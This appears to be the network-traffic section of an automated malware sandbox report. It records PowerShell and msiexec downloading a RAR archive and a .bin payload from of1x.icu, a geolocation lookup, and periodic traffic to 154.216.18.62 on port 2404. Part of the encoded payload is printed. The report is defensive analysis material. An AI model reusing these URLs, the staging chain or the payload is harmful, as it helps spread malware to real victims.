                                                                    Dec 11, 2024 10:43:54.383918047 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:54.384100914 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:54.384140968 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:54.385030031 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:54.385179043 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:54.385220051 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:54.386065006 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:54.386394024 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:54.386431932 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:54.387166023 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:54.387324095 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:54.387356997 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:54.388237953 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:54.388509035 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:54.388546944 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:58.434815884 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:58.554204941 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.554265976 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:58.554311991 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.554323912 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.554341078 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.554385900 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:58.554446936 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.554457903 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.554537058 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.554575920 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.554724932 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.554733992 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.592107058 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:43:58.673557997 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.673628092 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.673655987 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.673676968 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.673731089 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.673778057 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.674709082 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.711918116 CET240449778154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:43:58.712039948 CET497782404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:44:00.141123056 CET240449772154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:44:00.258872032 CET497722404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:44:00.378155947 CET240449772154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:44:30.144330025 CET240449772154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:44:30.145843029 CET497722404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:44:30.265871048 CET240449772154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:45:00.157470942 CET240449772154.216.18.62192.168.2.5
                                                                    Dec 11, 2024 10:45:00.159286022 CET497722404192.168.2.5154.216.18.62
                                                                    Dec 11, 2024 10:45:00.278645039 CET240449772154.216.18.62192.168.2.5
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 11, 2024 10:43:03.027375937 CET6203453192.168.2.51.1.1.1
                                                                    Dec 11, 2024 10:43:03.343600988 CET53620341.1.1.1192.168.2.5
                                                                    Dec 11, 2024 10:43:51.118550062 CET6010653192.168.2.51.1.1.1
                                                                    Dec 11, 2024 10:43:51.339440107 CET53601061.1.1.1192.168.2.5
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 11, 2024 10:43:03.027375937 CET192.168.2.51.1.1.10xfb90Standard query (0)of1x.icuA (IP address)IN (0x0001)false
                                                                    Dec 11, 2024 10:43:51.118550062 CET192.168.2.51.1.1.10x2bfdStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 11, 2024 10:43:03.343600988 CET1.1.1.1192.168.2.50xfb90No error (0)of1x.icu104.21.86.72A (IP address)IN (0x0001)false
                                                                    Dec 11, 2024 10:43:03.343600988 CET1.1.1.1192.168.2.50xfb90No error (0)of1x.icu172.67.216.143A (IP address)IN (0x0001)false
                                                                    Dec 11, 2024 10:43:51.339440107 CET1.1.1.1192.168.2.50x2bfdNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                    • of1x.icu
                                                                    • geoplugin.net
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.549779178.237.33.50803660C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 11, 2024 10:43:51.459953070 CET71OUTGET /json.gp HTTP/1.1
                                                                    Host: geoplugin.net
                                                                    Cache-Control: no-cache
                                                                    Dec 11, 2024 10:43:52.712585926 CET1171INHTTP/1.1 200 OK
                                                                    date: Wed, 11 Dec 2024 09:43:52 GMT
                                                                    server: Apache
                                                                    content-length: 963
                                                                    content-type: application/json; charset=utf-8
                                                                    cache-control: public, max-age=300
                                                                    access-control-allow-origin: *
                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                    Data Ascii: { "geoplugin_request":"8.46.123.175", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.549704104.21.86.724434088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-11 09:43:04 UTC172OUTGET /XrVFrZoK/Skorter.rar HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: of1x.icu
                                                                    Connection: Keep-Alive
                                                                    2024-12-11 09:43:05 UTC850INHTTP/1.1 200 OK
                                                                    Date: Wed, 11 Dec 2024 09:43:05 GMT
                                                                    Content-Type: application/octet-stream
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Cache-Control: max-age=14400
                                                                    CF-Cache-Status: MISS
                                                                    Last-Modified: Wed, 11 Dec 2024 09:43:05 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m8QqL2akgUPHns5Wp2EbpTJlA5CYKL38WMjiO%2BLI%2FIJUWAI01Q9yfWaftDKqSz2L12CFn3CTf4Jnoby29VCaVELBkbga8JsS8rGYuhsJV7GabeOJf1IqrDZ9Ng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8f04873fba8ec454-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1674&rtt_var=837&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4174&recv_bytes=786&delivery_rate=74185&cwnd=162&unsent_bytes=0&cid=392c33681f49837c&ts=725&x=0"
                                                                    2024-12-11 09:43:05 UTC519INData Raw: 33 38 63 66 0d 0a 63 51 47 62 63 51 47 62 75 79 32 63 45 77 44 72 41 6b 67 77 36 77 4c 2f 68 67 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 46 76 6e 34 4e 33 45 42 6d 33 45 42 6d 34 48 78 73 59 32 4e 56 6e 45 42 6d 33 45 42 6d 34 48 70 70 33 52 31 59 65 73 43 42 75 31 78 41 5a 76 72 41 6a 49 4f 63 51 47 62 75 69 51 6c 73 30 5a 78 41 5a 74 78 41 5a 74 78 41 5a 74 78 41 5a 73 78 79 6e 45 42 6d 2b 73 43 50 56 4b 4a 46 41 74 78 41 5a 76 72 41 69 56 53 30 65 4a 78 41 5a 76 72 41 71 72 71 67 38 45 45 63 51 47 62 63 51 47 62 67 66 6d 54 70 6c 59 45 66 4d 33 72 41 71 6f 62 36 77 4a 6b 6e 6f 74 45 4a 41 52 78 41 5a 76 72 41 6f 69 61 69 63 50 72 41 75 66 6c 63 51 47 62 67 63 4e 30 79 77 34 45 36 77 49 31 6b 4f 73 43 78 58 65 36 70 56 72 63 77 2b 73 43 76 75 42 78 41
                                                                    Data Ascii: 38cfcQGbcQGbuy2cEwDrAkgw6wL/hgNcJARxAZtxAZu5Fvn4N3EBm3EBm4HxsY2NVnEBm3EBm4Hpp3R1YesCBu1xAZvrAjIOcQGbuiQls0ZxAZtxAZtxAZtxAZsxynEBm+sCPVKJFAtxAZvrAiVS0eJxAZvrAqrqg8EEcQGbcQGbgfmTplYEfM3rAqob6wJknotEJARxAZvrAoiaicPrAuflcQGbgcN0yw4E6wI1kOsCxXe6pVrcw+sCvuBxA
                                                                    2024-12-11 09:43:05 UTC1369INData Raw: 77 41 42 41 41 44 72 41 70 68 59 63 51 47 62 55 33 45 42 6d 2b 73 43 79 36 6d 4a 36 2b 73 43 4c 4a 37 72 41 73 56 39 69 62 73 45 41 51 41 41 36 77 4c 2b 56 65 73 43 30 52 4b 42 77 77 51 42 41 41 44 72 41 6b 74 34 63 51 47 62 55 2b 73 43 7a 62 2f 72 41 76 41 74 61 76 39 78 41 5a 76 72 41 74 6c 34 67 38 49 46 36 77 4b 37 4c 2b 73 43 58 31 6f 78 39 6e 45 42 6d 2b 73 43 78 43 49 78 79 58 45 42 6d 2b 73 43 32 2b 65 4c 47 6e 45 42 6d 33 45 42 6d 30 46 78 41 5a 74 78 41 5a 73 35 48 41 70 31 39 4f 73 43 6c 30 31 78 41 5a 74 47 63 51 47 62 36 77 4a 55 65 49 42 38 43 76 75 34 64 64 35 78 41 5a 76 72 41 70 4a 30 69 30 51 4b 2f 48 45 42 6d 2b 73 43 78 37 59 70 38 48 45 42 6d 33 45 42 6d 2f 2f 53 63 51 47 62 63 51 47 62 75 68 68 45 42 41 44 72 41 72 57 62 36 77 4b 31
                                                                    Data Ascii: wABAADrAphYcQGbU3EBm+sCy6mJ6+sCLJ7rAsV9ibsEAQAA6wL+VesC0RKBwwQBAADrAkt4cQGbU+sCzb/rAvAtav9xAZvrAtl4g8IF6wK7L+sCX1ox9nEBm+sCxCIxyXEBm+sC2+eLGnEBm3EBm0FxAZtxAZs5HAp19OsCl01xAZtGcQGb6wJUeIB8Cvu4dd5xAZvrApJ0i0QK/HEBm+sCx7Yp8HEBm3EBm//ScQGbcQGbuhhEBADrArWb6wK1
                                                                    2024-12-11 09:43:05 UTC1369INData Raw: 2f 68 72 79 30 78 75 61 6b 4b 54 70 72 59 6d 42 77 7a 35 31 35 43 70 76 6f 4b 54 75 74 71 69 71 41 7a 35 38 76 39 55 2f 77 43 6e 68 71 7a 50 67 6d 38 53 59 78 2f 68 5a 4c 71 79 5a 71 30 65 62 67 36 69 66 77 6a 46 57 57 39 76 36 34 74 51 41 61 47 56 47 74 4b 36 64 69 70 38 36 72 66 48 6d 72 51 34 6c 69 72 42 63 2f 46 55 7a 39 6c 46 51 6f 7a 45 4b 39 48 72 70 53 59 39 67 6d 49 36 45 5a 6f 6c 57 43 58 6c 4b 4f 4d 4a 46 6e 73 4d 59 35 68 6e 62 68 45 6a 5a 6e 46 44 63 5a 57 44 2b 49 34 32 65 72 69 6d 55 4a 33 4b 56 6a 57 46 6f 6b 37 4d 62 2f 79 41 4e 64 33 68 57 55 34 76 67 4e 44 4a 55 56 65 78 50 4f 30 75 71 6f 4f 42 76 36 39 46 62 31 6c 73 68 53 4c 70 62 49 55 69 79 68 79 4a 63 53 36 61 42 63 35 42 33 56 59 77 42 41 78 6c 63 74 41 4e 75 73 72 34 32 4d 5a 72
                                                                    Data Ascii: /hry0xuakKTprYmBwz515CpvoKTutqiqAz58v9U/wCnhqzPgm8SYx/hZLqyZq0ebg6ifwjFWW9v64tQAaGVGtK6dip86rfHmrQ4lirBc/FUz9lFQozEK9HrpSY9gmI6EZolWCXlKOMJFnsMY5hnbhEjZnFDcZWD+I42erimUJ3KVjWFok7Mb/yANd3hWU4vgNDJUVexPO0uqoOBv69Fb1lshSLpbIUiyhyJcS6aBc5B3VYwBAxlctANusr42MZr
                                                                    2024-12-11 09:43:05 UTC1369INData Raw: 4b 6f 64 4d 36 31 79 51 6f 76 64 4e 6a 4d 7a 56 70 6a 31 67 2b 67 74 32 67 33 74 6b 30 74 6b 46 59 44 4f 71 75 74 33 4f 52 4b 49 53 6b 68 52 6d 4c 70 62 49 55 69 36 57 79 6e 4c 79 37 74 62 41 6e 49 4a 62 66 50 58 75 65 79 49 37 6b 6f 32 43 57 52 68 7a 31 57 47 65 63 35 4b 2b 6f 71 68 4c 4f 51 74 56 75 59 39 35 48 46 34 76 30 43 35 70 43 6a 6e 71 56 65 68 66 30 6f 33 77 6b 51 32 44 48 47 42 75 56 59 6d 39 70 42 55 67 6b 57 7a 35 79 71 32 47 64 73 6e 38 73 2b 4a 4e 44 66 67 43 48 39 41 31 48 45 43 33 33 56 49 42 7a 47 65 6e 45 54 64 33 62 75 46 44 72 6e 51 37 6c 73 78 53 4c 39 67 6c 77 72 41 6a 63 6c 58 68 59 64 46 72 50 4a 46 6d 54 43 38 53 68 6c 58 69 76 79 6c 43 68 4a 46 6e 2b 78 6d 43 50 6e 59 42 44 42 65 36 54 4b 42 33 35 6f 7a 77 59 7a 4a 6e 2b 32 6d
                                                                    Data Ascii: KodM61yQovdNjMzVpj1g+gt2g3tk0tkFYDOqut3ORKISkhRmLpbIUi6WynLy7tbAnIJbfPXueyI7ko2CWRhz1WGec5K+oqhLOQtVuY95HF4v0C5pCjnqVehf0o3wkQ2DHGBuVYm9pBUgkWz5yq2Gdsn8s+JNDfgCH9A1HEC33VIBzGenETd3buFDrnQ7lsxSL9glwrAjclXhYdFrPJFmTC8ShlXivylChJFn+xmCPnYBDBe6TKB35ozwYzJn+2m
                                                                    2024-12-11 09:43:05 UTC1369INData Raw: 6c 64 73 35 4f 2f 53 4b 74 53 2b 52 65 74 36 37 55 7a 55 35 72 34 43 2f 72 31 30 46 43 46 67 35 54 5a 74 6b 51 44 62 4b 4b 46 4e 52 39 74 42 53 44 7a 50 4e 58 6b 7a 55 52 31 4a 56 72 4e 49 45 65 4c 4e 44 36 6b 55 79 75 4c 49 55 69 79 52 4c 38 57 56 41 67 52 73 47 6a 70 63 51 69 2f 7a 6f 47 34 71 78 6c 68 53 4c 70 62 49 55 69 36 55 4f 53 39 43 65 6d 4e 62 57 47 4b 4e 4f 43 72 2b 43 6c 61 65 42 44 41 4d 4e 78 4e 6f 43 6c 59 78 64 6e 51 61 6b 73 42 53 4c 48 41 31 52 6c 49 76 6b 71 6c 71 46 68 45 6f 4b 53 35 65 42 41 4b 4d 7a 34 67 46 6a 6a 4e 51 4b 55 39 4f 38 46 51 51 7a 2b 73 78 42 75 43 4c 62 4f 54 76 30 67 70 55 76 6b 58 6e 54 6d 69 35 52 70 64 50 74 6c 52 56 41 47 67 42 41 4d 73 42 53 44 59 62 34 75 62 67 37 77 66 47 76 4d 57 45 6b 49 4f 35 38 49 65 69
                                                                    Data Ascii: lds5O/SKtS+Ret67UzU5r4C/r10FCFg5TZtkQDbKKFNR9tBSDzPNXkzUR1JVrNIEeLND6kUyuLIUiyRL8WVAgRsGjpcQi/zoG4qxlhSLpbIUi6UOS9CemNbWGKNOCr+ClaeBDAMNxNoClYxdnQaksBSLHA1RlIvkqlqFhEoKS5eBAKMz4gFjjNQKU9O8FQQz+sxBuCLbOTv0gpUvkXnTmi5RpdPtlRVAGgBAMsBSDYb4ubg7wfGvMWEkIO58Iei
                                                                    2024-12-11 09:43:05 UTC1369INData Raw: 6d 56 61 4d 59 6c 58 72 71 58 5a 70 31 35 6e 77 45 39 56 74 34 2f 4e 63 68 65 48 79 6e 53 39 30 2b 32 56 76 34 45 4b 71 52 63 4a 4d 78 43 76 77 78 64 51 5a 36 71 79 41 72 69 6c 73 68 53 4c 70 62 49 55 43 51 50 4c 4f 47 36 50 6b 4f 41 50 6b 46 76 6f 78 58 57 61 32 4f 52 56 75 53 59 4f 47 77 71 65 6e 2b 75 54 52 6a 48 72 42 69 31 63 4a 46 6a 41 71 52 73 4d 6c 58 6c 65 4b 78 6d 62 4a 45 44 58 72 6e 64 4e 6c 55 6b 62 59 55 2b 44 39 43 36 64 61 71 79 6a 69 65 30 67 51 32 4f 49 64 2f 35 7a 6d 48 44 35 4f 67 46 75 42 31 6d 47 63 54 67 37 44 31 76 72 6b 55 50 2f 57 73 69 54 6f 62 4a 45 4d 33 61 36 7a 6a 57 51 63 74 48 4d 4b 59 63 71 38 6e 6d 44 4f 55 33 59 38 78 63 43 6c 56 6d 71 37 30 39 6f 53 4c 65 2b 35 72 34 35 2b 65 71 58 54 35 31 2b 4a 66 4d 7a 38 2f 73 76
                                                                    Data Ascii: mVaMYlXrqXZp15nwE9Vt4/NcheHynS90+2Vv4EKqRcJMxCvwxdQZ6qyArilshSLpbIUCQPLOG6PkOAPkFvoxXWa2ORVuSYOGwqen+uTRjHrBi1cJFjAqRsMlXleKxmbJEDXrndNlUkbYU+D9C6daqyjie0gQ2OId/5zmHD5OgFuB1mGcTg7D1vrkUP/WsiTobJEM3a6zjWQctHMKYcq8nmDOU3Y8xcClVmq709oSLe+5r45+eqXT51+JfMz8/sv
                                                                    2024-12-11 09:43:05 UTC1369INData Raw: 4b 56 34 35 75 6b 2f 6e 70 30 59 63 41 54 69 49 7a 41 69 45 63 71 50 4b 6d 4d 50 51 4c 34 30 49 76 6c 42 2f 44 54 54 54 6a 4c 69 4b 57 39 48 43 79 38 73 68 53 4c 70 62 49 55 69 79 44 66 47 34 63 31 36 4f 45 36 6d 6c 6d 66 43 2f 70 4e 6d 36 2f 33 41 32 64 2f 65 58 4e 45 4d 34 54 2f 68 58 71 51 6d 79 4a 39 45 62 66 73 44 6a 30 49 52 68 63 73 55 42 57 4a 4f 4e 51 74 65 74 36 36 52 73 39 4c 50 75 7a 56 54 41 64 47 4f 56 4d 61 37 6b 52 75 38 76 47 33 49 4e 51 74 57 76 2f 6b 71 71 6f 36 7a 7a 34 4b 57 31 51 55 69 36 57 39 6b 47 2b 35 74 68 54 56 2f 55 32 68 78 36 53 79 46 47 4e 39 6c 78 43 4c 39 41 75 4a 73 70 72 4f 6c 55 71 6b 7a 44 34 35 4a 48 4e 32 77 6a 4e 6a 52 78 63 73 55 52 57 41 4f 49 72 47 39 36 72 33 6c 6f 54 46 65 4d 6c 32 6b 48 57 45 67 52 70 71 34
                                                                    Data Ascii: KV45uk/np0YcATiIzAiEcqPKmMPQL40IvlB/DTTTjLiKW9HCy8shSLpbIUiyDfG4c16OE6mlmfC/pNm6/3A2d/eXNEM4T/hXqQmyJ9EbfsDj0IRhcsUBWJONQtet66Rs9LPuzVTAdGOVMa7kRu8vG3INQtWv/kqqo6zz4KW1QUi6W9kG+5thTV/U2hx6SyFGN9lxCL9AuJsprOlUqkzD45JHN2wjNjRxcsURWAOIrG96r3loTFeMl2kHWEgRpq4
                                                                    2024-12-11 09:43:05 UTC1369INData Raw: 38 5a 55 2b 56 57 53 31 6d 67 64 6a 38 38 7a 6d 68 4e 71 53 79 46 4e 30 62 64 2b 6d 4b 34 6a 50 36 4e 4f 67 4a 58 41 70 54 6e 68 6b 74 32 6a 50 53 58 65 61 74 61 74 6b 35 4f 2f 61 43 6c 79 2b 51 51 39 71 6b 37 50 42 52 39 65 32 4d 52 63 59 6c 4d 74 6a 50 49 7a 55 78 51 6c 48 31 70 4a 59 78 71 50 6b 72 44 54 77 38 69 38 37 52 44 59 4a 4b 32 78 33 34 44 71 56 36 68 31 50 66 2f 6a 77 52 48 42 55 5a 71 6f 37 35 73 4d 74 6b 39 69 36 64 61 4b 79 78 69 51 39 6b 79 54 59 74 4c 34 66 6a 71 52 4b 2b 6f 34 4d 79 62 75 4f 6e 37 49 51 79 35 57 76 65 41 59 4e 44 4e 58 50 6b 73 2f 5a 57 4a 34 52 49 78 50 42 65 58 7a 56 45 4e 45 6a 37 72 4e 72 32 61 49 2f 57 4f 68 2b 57 49 55 56 50 59 50 63 71 33 65 79 4c 69 66 53 44 4e 76 78 54 38 4f 39 6b 6e 51 4c 6c 63 2f 31 67 58 55
                                                                    Data Ascii: 8ZU+VWS1mgdj88zmhNqSyFN0bd+mK4jP6NOgJXApTnhkt2jPSXeatatk5O/aCly+QQ9qk7PBR9e2MRcYlMtjPIzUxQlH1pJYxqPkrDTw8i87RDYJK2x34DqV6h1Pf/jwRHBUZqo75sMtk9i6daKyxiQ9kyTYtL4fjqRK+o4MybuOn7IQy5WveAYNDNXPks/ZWJ4RIxPBeXzVENEj7rNr2aI/WOh+WIUVPYPcq3eyLifSDNvxT8O9knQLlc/1gXU
                                                                    2024-12-11 09:43:05 UTC1369INData Raw: 77 4e 67 46 66 62 6a 31 70 32 56 66 46 44 46 76 47 70 56 39 6c 65 4b 42 46 53 52 63 69 67 37 36 4f 45 49 41 45 4e 73 57 69 36 57 39 46 58 33 5a 73 68 53 4c 70 62 49 55 69 78 47 41 6c 74 76 59 34 4b 36 34 79 5a 76 4c 43 6d 66 4d 6f 72 68 4a 4d 2b 59 4a 79 5a 35 43 43 6b 38 56 58 66 6f 34 4f 79 61 71 4e 4e 43 30 5a 78 73 56 6c 6a 6f 51 36 39 54 37 53 4f 52 4f 41 69 67 6e 46 59 75 6c 43 7a 64 77 4c 69 78 43 4e 63 6e 46 51 72 55 6b 52 4d 4e 56 39 2b 2b 56 54 5a 79 47 74 45 38 6b 52 4f 42 58 41 5a 56 46 46 79 78 54 46 62 6f 34 31 4a 46 78 30 62 53 5a 2b 44 58 51 71 33 53 46 2f 75 59 45 65 5a 71 37 75 43 78 41 76 59 61 6b 36 63 33 67 57 6c 68 31 45 35 63 6d 43 48 2f 75 4a 46 32 7a 63 59 4a 77 50 51 6b 66 6a 67 39 62 36 79 31 52 2b 7a 50 39 39 77 4c 6a 31 51 70
                                                                    Data Ascii: wNgFfbj1p2VfFDFvGpV9leKBFSRcig76OEIAENsWi6W9FX3ZshSLpbIUixGAltvY4K64yZvLCmfMorhJM+YJyZ5CCk8VXfo4OyaqNNC0ZxsVljoQ69T7SOROAignFYulCzdwLixCNcnFQrUkRMNV9++VTZyGtE8kROBXAZVFFyxTFbo41JFx0bSZ+DXQq3SF/uYEeZq7uCxAvYak6c3gWlh1E5cmCH/uJF2zcYJwPQkfjg9b6y1R+zP99wLj1Qp
                                                                    2024-12-11 09:43:05 UTC1369INData Raw: 53 37 33 55 49 53 6b 63 62 36 4c 70 62 49 55 69 36 57 79 6f 71 47 4e 41 47 6c 38 62 72 30 55 55 39 75 79 46 49 75 6c 73 68 53 4c 45 68 47 59 54 50 45 6f 75 6e 58 6c 66 76 4e 70 52 4c 2f 46 77 45 47 66 74 51 45 6f 43 62 55 7a 65 44 4d 66 75 50 73 72 44 45 30 6d 73 4b 70 49 6a 30 43 38 5a 72 49 64 78 70 57 6d 50 59 41 57 6b 35 71 56 73 32 69 58 78 64 76 51 66 42 75 4b 6c 64 59 55 69 36 57 79 46 49 75 6c 49 55 6b 63 35 55 2b 6e 4c 30 57 6b 4b 72 5a 58 41 56 41 67 43 77 2f 74 2f 4d 36 51 36 6e 31 4a 43 58 79 78 71 6b 57 74 2b 47 74 57 75 70 4a 56 32 33 64 5a 65 71 2f 32 78 7a 49 79 62 49 38 64 78 34 55 4c 33 62 76 58 2f 69 37 6c 71 37 50 36 57 59 63 4b 55 6b 77 61 63 64 77 7a 34 32 4d 4b 62 6c 38 4b 55 70 37 31 4c 66 4d 7a 30 33 56 45 4a 68 7a 5a 4f 54 76 32
                                                                    Data Ascii: S73UISkcb6LpbIUi6WyoqGNAGl8br0UU9uyFIulshSLEhGYTPEounXlfvNpRL/FwEGftQEoCbUzeDMfuPsrDE0msKpIj0C8ZrIdxpWmPYAWk5qVs2iXxdvQfBuKldYUi6WyFIulIUkc5U+nL0WkKrZXAVAgCw/t/M6Q6n1JCXyxqkWt+GtWupJV23dZeq/2xzIybI8dx4UL3bvX/i7lq7P6WYcKUkwacdwz42MKbl8KUp71LfMz03VEJhzZOTv2


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.549761104.21.86.724433660C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-11 09:43:44 UTC179OUTGET /cqhHdWpt/PiOlNxFUCT165.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: of1x.icu
                                                                    Cache-Control: no-cache
                                                                    2024-12-11 09:43:45 UTC861INHTTP/1.1 200 OK
                                                                    Date: Wed, 11 Dec 2024 09:43:45 GMT
                                                                    Content-Type: application/octet-stream
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Cache-Control: max-age=14400
                                                                    CF-Cache-Status: MISS
                                                                    Last-Modified: Wed, 11 Dec 2024 09:43:45 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Os1eL3CH5bB4uWDnmXdWv43SW0k3%2BwNiaoWrbFqYNFk%2Fs1ndyvgIztHuUhSx%2F%2FPbGUHVyxo%2FEe5dwhc2tcBP%2Fqah%2Bx58SS4AhRzTX2OsmovN0yvrwEY2JA2MA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8f04883ae891c35a-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1467&rtt_var=733&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4172&recv_bytes=817&delivery_rate=290171&cwnd=246&unsent_bytes=0&cid=397d934143c66536&ts=762&x=0"
